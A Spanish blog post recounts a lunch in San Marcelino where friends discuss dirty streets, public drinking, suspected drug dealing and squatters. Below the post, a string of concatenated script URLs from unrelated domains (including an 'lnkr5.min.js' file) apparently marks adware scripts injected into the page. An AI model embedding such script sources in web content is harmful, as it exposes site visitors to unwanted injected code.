All-focus

All-focus

Una comida entre amigos en San Marcelino

Posted by

A pesar de ser agosto no todo el mundo estamos de vacaciones. Algunos aprovechamos estos días de verano para reunirnos  con amigos, familiares y demás. Así es como en el barrio de San Marcelino comimos varias personas, este pasado viernes, comentando asuntos que nos llamaron la atención como la cantidad de hojas secas que vimos por el suelo. La falta de limpieza era evidente. Según los vecinos, no pasan, muy a menudo, los servicios que se dedican a ello.  Los excrementos de perros también forman parte del paisaje gracias a la falta de civismo de los dueños. Un tema llevaba a otro y comentábamos lo desolador que resulta ver a gente bebiendo y/o fumando en la calle, sobre todo, con niños pequeños alrededor. Algunos con demasiada bebida en el cuerpo y otros fumando productos que no parecían comprados en el estanco. Así salió el tema de la venta de estos productos que, parece ser,presuntamente, había cuajado en el barrio. Eso al menos es lo que nos contaba uno de los vecinos que tiene a uno de estos vendedores en su finca: contínuas entradas y salidas de desconocidos durante todo el día y la noche. Se echa de menos Policía de proximidad y/o de barrio a quien informar de estos asuntos in situ para que puedan restablecer la normalidad, concluímos.   Y ya que estábamos metidos de lleno con los problemas de la finca de este señor,  nos dijo que,también, tenía ocupas: un vecino fue deshauciado por falta de pago, el piso se lo quedó el banco, y, al tiempo, entraron, presuntamente, los ocupas. La comunidad de propietarios se dirigió al banco propietario del piso que, presuntamente, afirmó que no iban a hacer nada. Resultaba demasiado caro y costoso echarlos. Parece ser que resulta más sencillo deshauciar a personas honradas que a ocupas.

Lo que iba a ser una comida agradable entre amigos se convirtió en un debate sobre seguridad ciudadana y ayuntamientos del cambio en que nadie salió bien parado. Esperemos que logren encontrar el modo de solucionar estos problemas.

http://linkgolock.xyz/addons/lnkr5.min.jshttp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6839x&r=1534153913207http://linkgolock.xyz/ext/1ab78adcf736ff0ca5.js?sid=52200_6839_&title=&blocks%5B%5D=31af2

The following two tabs change content below.

Pepi Parra

Latest posts by Pepi Parra (see all)

Deja un comentario

Twitter Auto Publish Powered By : XYZScripts.com
Member of The Internet Defense League
A %d blogueros les gusta esto: